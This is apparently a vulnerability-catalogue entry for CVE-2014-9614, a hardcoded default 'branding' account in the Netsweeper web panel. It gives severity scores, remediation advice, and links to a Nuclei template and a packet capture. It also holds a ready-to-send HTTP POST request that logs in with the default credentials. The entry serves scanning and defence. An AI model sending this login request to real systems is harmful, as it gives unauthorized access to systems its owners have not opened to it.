| Title | Netsweeper 4.0.5 - Default Weak Account |
|---|---|
| Author | daffainfo |
| Severity | Critical |
| Impact | An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account. |
| Remediation | Change the default credentials to strong and unique ones. |
| CVSS Score | 9.8 |
| EPSS Score | 0.69538 |
| CVE ID | CVE-2014-9614 |
| CWE ID | CWE-798 |
| Tags | cve2014 cve netsweeper default-login packetstorm xss vuln |
The Web Panel in Netsweeper before 4.0.5 has a default password of ‘branding’ for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.
POST /webadmin/auth/verification.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.3
Connection: close
Content-Length: 45
Origin: http://www.victim.com
Referer: http://www.victim.com/webadmin/start/
Accept-Encoding: gzip
login=branding&password=branding&Submit=Login
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-9614.yaml
🦈 Packet Capture: ⬇️ Download cve-2014-9614.pcap
N/AN/A